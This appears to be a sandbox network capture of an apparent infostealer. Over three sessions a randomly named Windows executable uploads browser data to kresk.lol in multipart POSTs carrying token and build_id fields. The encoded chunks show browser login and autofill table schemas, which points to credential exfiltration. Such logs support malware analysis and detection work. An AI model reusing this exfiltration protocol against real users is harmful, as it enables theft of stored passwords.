Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 159.69.102.165 | Destination Port: 443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:49 UTC | 319 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:04:49 UTC | 16355 | OUT | Data Ascii: ------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------7QQIMOZMYUSRQI58G4WTCont
2024-12-04 16:04:49 UTC | 16355 | OUT | Data Raw: [binary upload chunk, hex dump omitted]
2024-12-04 16:04:49 UTC | 16355 | OUT | Data Raw: [binary upload chunk, hex dump omitted]
2024-12-04 16:04:49 UTC | 16355 | OUT | Data Raw: [binary upload chunk, hex dump omitted]
2024-12-04 16:04:49 UTC | 16355 | OUT | Data Raw: [binary upload chunk, hex dump omitted]
2024-12-04 16:04:49 UTC | 16355 | OUT | Data Raw: [binary upload chunk, hex dump omitted]
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 16:04:51 UTC  158  IN   HTTP/1.1 200 OK
                                   Server: nginx
                                   Date: Wed, 04 Dec 2024 16:04:51 GMT
                                   Content-Type: text/html; charset=UTF-8
                                   Transfer-Encoding: chunked
                                   Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.4  49768        159.69.102.165  443               8080  C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:51 UTC  318                OUT        POST / HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=----GDBS0R1VAI5F3EKN7Y5F
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                       Host: kresk.lol
                                                       Content-Length: 55081
                                                       Connection: Keep-Alive
                                                       Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 53 30 52 31 56 41 49 35 46 33 45 4b 4e 37 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 53 30 52 31 56 41 49 35 46 33 45 4b 4e 37 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 53 30 52 31 56 41 49 35 46 33 45 4b 4e 37 59 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------GDBS0R1VAI5F3EKN7Y5FContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------GDBS0R1VAI5F3EKN7Y5FContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------GDBS0R1VAI5F3EKN7Y5FCont
                                                                                                                                                                      2024-12-04 16:04:51 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:51 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:51 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 16:04:53 UTC  158  IN   HTTP/1.1 200 OK
                                   Server: nginx
                                   Date: Wed, 04 Dec 2024 16:04:53 GMT
                                   Content-Type: text/html; charset=UTF-8
                                   Transfer-Encoding: chunked
                                   Connection: close
2024-12-04 16:04:53 UTC  12   IN   Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                   Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.4  49775        159.69.102.165  443               8080  C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-04 16:04:53 UTC  319                OUT        POST / HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                       Host: kresk.lol
                                                       Content-Length: 142457
                                                       Connection: Keep-Alive
                                                       Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                      Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
